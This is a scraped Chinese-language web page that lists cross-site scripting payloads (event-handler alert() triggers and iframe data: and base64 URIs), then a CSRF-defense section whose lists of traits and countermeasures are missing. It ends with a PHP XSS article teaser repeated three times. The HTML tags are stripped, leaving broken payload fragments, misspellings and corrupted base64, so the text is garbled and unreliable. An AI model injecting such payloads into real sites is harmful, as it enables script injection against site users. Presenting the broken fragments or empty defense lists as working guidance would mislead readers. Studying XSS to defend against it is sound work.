1. 通過注入的標籤事件觸發"alert('xss')"
>
<
/body>
"alert('1')" style=
"postion:fixed;width:100%;heith:100%"
>
<
/p>
"alert('1')" autofocus/
>
2. 通過注入的帶有src屬性的標籤觸發
"">
<
/iframe>
"data:text/html,"
>
<
/iframe>
"data:text/html;base64,phnjcmlwdd5hb**ydcgnmscppc9zy3jpchq+"
>
<
/iframe>
csrf攻擊–跨站請求偽造攻擊
csrf防禦:
csrf通常從第三方**發起,被攻擊的**無法防止攻擊發生,只能通過增強自己**針對csrf的防護能力來提公升安全性。
csrf的兩個特點:
針對這兩點,我們可以專門制定防護策略,如下:
PHP和XSS跨站攻擊
其實這個話題很早就想說說了,發現國內不少php站點都有xss漏洞。今天偶然看到php5的乙個xss漏洞,在此小結一下。順便提醒,使用php5的朋友最好打下補丁,或者公升級一下。如果你不懂什麼是xss,可以看這裡,或者這裡 中文的也許會好懂一些 國內不少論壇都存在跨站指令碼漏洞,例如這裡 有乙個goo...
PHP和XSS跨站攻擊
其實這個話題很早就想說說了,發現國內不少php站點都有xss漏洞。今天偶然看到php5的 乙個xss漏洞,在此小結一下。順便提醒,使用php5的朋友最好打下補丁,或者公升級一下。如果你不懂什麼是xss,可以看 這裡,或者 這裡 中文的也許會好懂一些 國內不少論壇都存在跨站指令碼漏洞,例如 這裡 有乙...
PHP和XSS跨站攻擊
其實這個話題很早就想說說了,發現國內不少php站點都有xss漏洞。今天偶然看到php5的 乙個xss漏洞,在此小結一下。順便提醒,使用php5的朋友最好打下補丁,或者公升級一下。如果你不懂什麼是xss,可以看 這裡,或者 這裡 中文的也許會好懂一些 國內不少論壇都存在跨站指令碼漏洞,例如 這裡 有乙...